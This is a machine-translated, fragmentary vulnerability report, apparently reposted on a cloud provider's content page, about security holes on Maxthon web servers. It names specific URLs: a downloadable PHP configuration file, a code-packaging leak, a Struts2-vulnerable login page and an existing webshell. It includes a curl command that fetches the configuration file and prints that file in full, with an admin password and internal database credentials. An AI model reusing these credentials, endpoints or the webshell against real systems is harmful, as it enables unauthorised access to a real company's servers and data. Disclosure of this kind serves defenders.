Web browser development-related website security vulnerability packaging (source code leakage, code packaging, command execution, and online backdoor files)

Source: Internet
Author: User

Http://kernel-c.maxthon.cn/www/init.php server not resolved can download the database configuration file http://build.maxthon.com/code packaging http://partner.maxthon.com/login.action struts2 vulnerability, found has been intruded (dark clouds have been reported to you this vulnerability you did not repair ...) Http://partner.maxthon.com/help.jsp this is someone else's webshell curl http://kernel-c.maxthon.cn/www/init.php

<?php    ob_start();    error_reporting();        define('BASE_PATH', '/data/html/kernel-c.maxthon.com/www');    define('__DATA__', BASE_PATH . '/wb_cpt/dw');    define('__BIN__', BASE_PATH . '/bin');          // login user info        $_admins = array(             array (                 'account' => 'admin',                 'password' => 'r5Y4d89V'             ),         );         // db info    $_db_config = array(        'driver' => 'mysql',        'hostname' => '10.0.16.70',        'username' => 'compatible_stat',        'passwrd' => 'maxthon3%compatible_stat',        'database' => 'compatible_stat',        'pconnect' => 0,        'prefix' => 'incompactible_',        'charset' => 'utf8',    );      require_once  BASE_PATH . '/libs/global.fun.php';    require_once  BASE_PATH . '/libs/mypdo.class.php';?>

 


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.